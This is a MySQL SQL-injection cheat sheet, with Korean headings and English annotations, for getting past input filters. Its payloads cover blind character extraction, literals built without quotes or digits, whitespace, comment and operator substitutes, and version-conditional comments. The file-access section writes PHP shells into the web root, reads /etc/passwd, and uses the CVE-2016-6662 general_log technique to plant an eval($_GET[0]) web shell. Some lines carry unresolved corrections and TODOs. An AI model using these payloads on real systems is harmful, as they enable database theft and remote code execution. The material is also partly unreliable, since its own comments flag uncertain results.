
1. 특정 값을 비교해야 하는 상황에서 사용할만한 것들

# 1. Comparison operators and predicates.  Each trailing comment is the result
#    MySQL returns for the statement: True = 1, False = 0.
select 'admin'='admin'; # True
select 'admin'<=>'admin'; # True (NULL-safe equality; unlike =, it can also compare NULLs)
select 'admin'!='admin'; # False
select 'admin'<>'admin'; # False
select 'admin'<'admin'; # False
select 'admin'<'bdmin'; # True (ordering of strings follows the collation in effect)

# Set membership, including a subquery on the right-hand side.
select 'admin' in ('admin'); # True
select 'admin' in (select 'admin'); # True
select 'admin' not in ('admin'); # False
select 'admin' not in ('amine'); # True

# BETWEEN is inclusive on both ends and compares strings lexically.
select 'admin' between 'a' and 'z'; # True
select 'admin' between 'b' and 'z'; # False
select 'admin' between 'ac' and 'zz'; # True ('ad' sorts after 'ac')
select 'admin' between 'ad' and 'zz'; # True (the lower bound is a prefix of the value)
select 'admin' between 'ae' and 'zz'; # False ('ad' sorts before 'ae')

# Pattern predicates: REGEXP, LIKE (% = any run, _ = one character) and SOUNDS LIKE (SOUNDEX equality).
select 'admin' regexp 'adm.*'; # True
select 'admin' like 'adm%'; # True
select 'admin' like 'ad_in'; # True
select 'admin' sounds like 'admni'; # True
select 'admin' sounds like 'aemin'; # False

# Functions whose numeric result encodes the comparison.
select strcmp('admin', 'admin'); # 0
select strcmp('admie', 'admin'); # -1
select find_in_set('admin', 'admin') # 1 (1-based position in the comma-separated list, 0 when absent)
select find_in_set('admin', 'admie') # 0
select field('admin', 'admin') # 1 (1-based position among the following arguments, 0 when absent)
select field('admin', 'admie') # 0

# IS TRUE / IS FALSE test the numeric value of the operand.
select 1 is TRUE; # True
select 0 is FALSE; # True
select 'admin'='admin' is TRUE; # True ('admin'='admin' evaluates to 1, and 1 IS TRUE)
select 'admin' is TRUE; # False (a string with no leading digits casts to 0 — see section 10)
select 'ladmin' is TRUE; # page says True, but 'ladmin' (letter l) also casts to 0, i.e. False; '1admin' with a leading digit would be True (cf. '1admin'=1 in section 10) — TODO confirm the intended literal

# Trailing spaces and letter case both depend on the collation, unless BINARY forces a byte-wise compare.
select 'admin'='admin         '; # True under a PAD SPACE collation (the MySQL 5.x default); NO PAD collations such as MySQL 8's utf8mb4_0900_ai_ci give False
select 'Admin'='admin'; # True under a case-insensitive (_ci) collation
select binary 'Admin'='admin'; # False (BINARY compares bytes, so case matters)
select binary 'admin'='admin       '; # False (a byte-wise comparison also keeps trailing spaces)

select instr('admin', 'a'); # 1 (1-based index of the first match, counted from the left)
select instr('admin', 'c'); # 0 (0 when there is no match)

 

 

2. substr와 같이 문자열에서 Index의 문자를 검사하는 것들

# 2. Extracting characters by position.  MySQL string positions are 1-based.
select substr('admin', 1, 1)='a'; # True
select substr('admin' from 1 for 3); # 'adm'
select substr('admin' from 1 for 1)='a'; # True

# SUBSTRING and MID are synonyms of SUBSTR.
select substring('admin', 1, 1)='a'; # True
select substring('admin' from 1 for 3); # 'adm'
select substring('admin' from 1 for 1)='a'; # True

select mid('admin', 1, 1)='a'; # True
select mid('admin' from 1 for 1); # 'a'
select mid('admin' from 1 for 2); # 'ad' (two characters starting at position 1 — not 'd')
select mid('admin' from 1 for 1)='a'; # True

# LEFT/RIGHT take a prefix/suffix; nesting them isolates a single character.
select left('admin', 1)='a'; # True
select left('admin', 3)='adm'; # True
select right('admin', 1)='n'; # True
select right('admin', 3)='min'; # True
select right(left('admin', 1), 1)='a'; # True
select right(left('admin', 2), 1)='d'; # True

# LPAD/RPAD truncate when the requested length is shorter than the string, so here they behave like LEFT.
select lpad('admin', 1, 1)='a'; # True
select lpad('admin', 2, 1)='ad'; # True
select rpad('admin', 1, 1)='a'; # True
select rpad('admin', 2, 1)='ad'; # True

# INSERT(str, pos, len, newstr) replaces len characters at pos; with newstr = '' it deletes them.
select insert(insert('admin', 1, 0, ''), 2, 256, '')='a'; # True (inner call replaces 0 chars, a no-op; outer call removes everything after the first character)
select insert(insert('admin', 1, 1, ''), 2, 256, '')='d'; # True (inner call drops 'a', leaving 'dmin'; outer call keeps only 'd')

# INSTR, POSITION and LOCATE all return the 1-based index of the first match, or 0 when absent.
select instr('admin', 'a'); # 1
select instr('admin', 'd'); # 2
select instr('admin', 'dm'); # 2
select instr('admin', 'c'); # 0

select position('a' in 'admin'); # 1
select position('dm' in 'admin'); # 2
select position('c' in 'admin'); # 0

select locate('a', 'admin'); # 1
select locate('dm', 'admin'); # 2
select locate('c', 'admin'); # 0

 

 

3. 문자열에 대한 필터링이 되어 있는 경우 대신할 것들

# 3. Ways of producing the string 'admin' other than a single quoted literal.
select 'admin'; # admin
select 'adm' 'in'; # admin (adjacent string literals are concatenated)
select 'adm''in'; # adm\'in (a doubled single quote is an escaped quote inside the literal)
select 0x61646d696e; # admin (hexadecimal literal, read as a string in string context)
select 0b0110000101100100011011010110100101101110; # admin (binary literal)
select concat(char(97), 'dmin'); # admin
select unhex(unhex(36313634366436393665)); # admin (the inner UNHEX turns the digit string into '61646d696e')
select mid(encrypt(ceil(pi()*pi())*ceil(pi()*pi())*ceil(pi()*pi())*ceil(pi()*pi())*floor(pi())+ceil(pi()*pi())*ceil(pi()*pi())*ceil(pi()*pi())*ceil(pi())+ceil(pi()*pi())*ceil(pi()*pi())*floor(pi()*pi())+ceil(pi()*pi())*(floor(pi()*pi())-true),mid(password(true+true),floor(pi()*pi()*floor(pi()))+true+true,true+true)),true, (ceil(pi())+true)); # ADmiN (case-mixed; the numeric arguments are built from pi() and true as in section 4)
select {hex`unhex`('61646d696e')}; # abc (oddly, the letters do not come through..)
select /*!50000+0x61646d696e*/; # the body of a /*!50000 ... */ comment is executed only by MySQL >= 5.0 (see section 6)
select concat(unhex(61), unhex(64), unhex('6d'), unhex(69), unhex('6e')); # admin (unquoted numbers are converted to their digit string first)
select concat(conv(10, 10, 36), conv(13, 10, 36), conv(22, 10, 36), conv(18, 10, 36), conv(23, 10, 36)); # admin — strictly 'ADMIN', since CONV() emits upper-case digits; it equals 'admin' only under a case-insensitive collation (see section 1)
select char(97, 100, 109, 105, 110); # admin
select x'61646d696e'; # admin (standard hex-string literal form)

 

 

4. 숫자를 나타낼 때 사용하는 것들

# 4. Expressions that evaluate to a given integer without writing a digit.
#    The version()-based ones depend on the server: version()+0 is 5.1 in this
#    page's example (section 10), so they assume a 5.x server.

# 0
select false;
select !pi(); # NOT of a non-zero value

# 1
select true;
select !!pi();
select ceil(cos(true)); # cos(1) ~ 0.54, rounded up

# 2
select true + true;
select ceil(tan(true)); # tan(1) ~ 1.56, rounded up

# 3
select floor(pi());
select ceil(pi()-true);

# 4
select ceil(pi());

# 5
select floor(version()); # server-dependent: the major version digit (5 on a 5.x server)
select ceil(pi())+true;

# 6
select ceil(version()); # server-dependent: 6 on a 5.x server

# 7 
select ceil(pi() * 2);

# 8
select floor(pi() + version()); # server-dependent: 8 on a 5.x server

# 9
select floor(pi() * pi());

# 10
select concat(true, false); # the digits are concatenated as a string, '10'

# 31
select hex(hex(true)); # hex(true) is '1'; hex('1') is the hex code of the character, '31'
# Putting it together
select concat(unhex(concat(ceil(version()), true)), unhex(concat(ceil(version()), ceil(pi()))), unhex(concat(ceil(version()), 'd')), unhex(concat(ceil(version()), floor(pi()*pi()))), unhex(concat(ceil(version()), 'e'))); # admin — assumes ceil(version()) is 6 (a 5.x server), so the concats yield the hex pairs 61 64 6d 69 6e

 

 

5. 파일 input, output에 관련된 쿼리문들

# 5. Server-side file access.  @@secure_file_priv governs INTO OUTFILE/DUMPFILE and
#    LOAD_FILE(): a directory value limits them to that path, an empty value imposes
#    no limit, NULL disables them entirely.  Keeping it pointed at a dedicated directory
#    (or NULL) and withholding the FILE privilege from application accounts is the mitigation.
select @@secure_file_priv;

# All three statements below additionally require the FILE privilege on the account.
select '<?php phpinfo(); ?>' into outfile '/var/www/html/ch4njun.php';
select '<?php phpinfo(); ?>' into dumpfile '/var/www/html/ch4njun.php'; # DUMPFILE writes the value raw, without row/column formatting
select load_file('/etc/passwd');

# CVE-2016-6662
# Changing general_log_file / general_log at GLOBAL scope requires SUPER
# (SYSTEM_VARIABLES_ADMIN on MySQL 8); application accounts should not hold it.
set global general_log_file = '/var/www/html/ch4njun.php';
set global general_log = on;
select '<?php eval($_GET[0]); ?>';

 

 

6. Union와 같이 내가 원하는 결과를 같이 볼 수 있는 것들

# 6. /*!NNNNN ... */ is a MySQL version-conditional comment: a server at or above
#    version NNNNN executes the body, any other server treats it as a comment.
#    A bare /*! ... */ is executed by every MySQL server.

# Shown as an extra column
select /*!40000 version(),*/1; # MySQL Version >= 4.0
select /*!50000 version(),*/1; # MySQL Version >= 5.0

# Shown as an extra row
select 1/*!union select version()*/;
/*!select 1 union select version()*/;

 

 

7. 스페이스바(\x20)가 필터링 되어있을 때 사용할만한 것들

\x20
\x09
\x0a
\x0b
\x0c
\x0d
\xa0
/**/
( ) 를 사용하는 방법 : select(*)from(table_name);

 

 

8. 주석으로 사용할 수 있는 것들

/* ch4njun */
# ch4njun
-- - ch4njun
%00 ch4njun (PHP 기준 ; 뒤에 %00가 들어가야한다. - 되는꼴을...)

# The backtick-quoted `where 1` is parsed as a table alias for users, not as a WHERE clause (surprising, but valid).
select * from users `where 1`

 

 

9. 논리연산자(AND, OR)로 사용할 수 있는 것들

and
&&
%26%26

or
||
%7c%7c

 

 

10. Type 변환에 사용할 수 있는 것들

# 10. Implicit and explicit type conversion.  A string used as a number keeps its
#     leading digits and becomes 0 when it has none.
select '1'+1; # 2
select 'a'+0; # 0 (no leading digits, so 'a' casts to 0 — not 1 as the page originally stated)
select '1admin'=1; # True (leading digits are kept when the string is cast)
select 'admin'=1; # False ('admin' casts to 0)
select '123'=123; # True
select concat(2, 'test'); # '2test' (the number is converted to its digit string)
select true + true; # 2
select`version`()+0; # 5.1 (server-dependent: version() cast to a number keeps the leading major.minor)

select cast(38.8 as char); # '38.8'
select convert(38.8, char); # '38.8'
select convert('admin', int); # 0 (INT as a CONVERT target is MariaDB/older-MySQL syntax; MySQL uses SIGNED — TODO confirm on the target server)

# Character code conversions.
select ascii('a'); # 97
select ord('a'); # 97
select hex('a'); # 61
select char(97); # 'a'
select unhex('61'); # 'a' (quote the argument when it contains letters; an unquoted 61 is read as the number 61 first)
select bin(ord('a')); # 1100001
select bin(97); # 1100001